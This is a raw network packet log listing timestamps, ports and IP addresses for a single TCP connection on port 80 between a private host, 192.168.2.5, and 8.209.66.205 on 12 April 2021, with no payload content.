Apr 12, 2021 15:12:19.962330103 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.962364912 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.962383986 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.962389946 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.962399960 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.962435007 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.962445974 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.962450027 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.962467909 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.962502003 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.962515116 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.962521076 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.962536097 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.962579012 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:19.962583065 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.962587118 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:19.963076115 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.003906965 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.003948927 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004013062 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004055977 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004093885 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004121065 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004132032 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004146099 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004149914 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004168987 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004168987 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004206896 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004240990 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004245043 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004246950 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004292965 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004308939 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004313946 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004336119 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004359961 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004374027 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004411936 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004442930 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004450083 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004462957 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004466057 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004498005 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004535913 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004573107 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004611015 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004614115 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004627943 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004631996 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004636049 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004648924 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004686117 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004700899 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004709005 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004734039 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004776955 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004790068 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004796982 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004815102 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004853964 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004868031 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004875898 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004893064 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004929066 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.004937887 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004944086 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.004968882 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005007982 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005024910 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005034924 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005054951 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005100012 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005117893 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005125046 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005137920 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005176067 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005193949 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005199909 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005214930 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005244970 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005275011 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005306959 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005337000 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005373955 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005420923 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005428076 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005436897 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005469084 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005475998 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005512953 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005537987 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005546093 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005552053 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005589962 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005608082 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005614996 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005625963 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005664110 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005683899 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005688906 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005701065 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005747080 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005754948 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005760908 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005789042 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005825996 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005844116 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005852938 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005865097 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005903006 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005922079 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005928040 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005940914 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005980015 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.005994081 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.005999088 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006016970 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006040096 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006066084 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006107092 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006122112 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006128073 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006144047 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006181955 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006196022 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006201982 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006218910 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006256104 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006273031 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006282091 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006294012 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006331921 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006347895 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006354094 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006377935 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006419897 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006432056 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006438017 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006455898 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006493092 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006509066 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006515026 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006531000 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006568909 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006583929 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006588936 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006606102 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006644011 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006658077 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006668091 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006690025 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006731033 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006746054 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006752968 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006767988 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006805897 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006820917 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006825924 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006844044 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006879091 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006897926 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006905079 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006917000 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006953955 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.006972075 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.006978035 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007000923 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007038116 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007041931 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007081032 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007107019 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007116079 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007118940 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007157087 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007175922 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007181883 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007194042 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007230997 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007249117 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007256031 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007267952 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007314920 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007319927 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007325888 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007356882 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007392883 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007411003 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007416964 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007430077 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007467985 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007486105 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007494926 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007503986 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007540941 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007560968 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007566929 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007577896 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007625103 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007637024 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007642984 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007664919 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007702112 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007725000 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007731915 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007739067 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007776976 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007797003 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007802963 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007812977 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007853031 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007878065 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007883072 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007889986 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007936001 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.007951021 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007960081 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.007978916 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008016109 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008033037 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008038998 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008054972 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008094072 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008115053 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008121014 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008130074 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008167028 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008188963 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008193970 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008203983 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008249998 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008269072 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008274078 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008291960 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008328915 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008353949 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008363962 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008367062 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008404970 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008409023 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008430004 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008440971 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008477926 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008496046 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008502960 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008514881 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008560896 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008574009 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008580923 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008603096 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008632898 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008663893 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008702040 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008713007 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008719921 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008739948 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008776903 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008794069 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008799076 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008814096 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008848906 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008850098 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008857965 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008865118 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008888006 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008912086 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008934021 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.008960009 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.008975029 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.009011984 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.009038925 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.009047985 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.009051085 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.009094954 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.009115934 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.009121895 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.009130955 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.009171009 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.009196997 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.009202957 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.009207964 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.009254932 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.009272099 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.009278059 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.009296894 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.009334087 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.009357929 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.009366989 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.009408951 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.050688028 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.050746918 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.050785065 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.050813913 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.050832033 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.050832987 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.050836086 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.050874949 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.050879002 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.050911903 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.050951004 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.050959110 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.050964117 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.050990105 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051028013 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051040888 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051044941 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051068068 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051105976 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051119089 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051122904 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051152945 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051194906 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051232100 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051239967 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051244974 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051248074 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051270962 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051282883 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051309109 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051345110 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051359892 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051364899 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051383972 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051422119 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051436901 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051443100 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051467896 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051508904 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051522970 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051527977 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.051548004 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051585913 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.051598072 CEST	49720	80	192.168.2.5	8.209.66.205
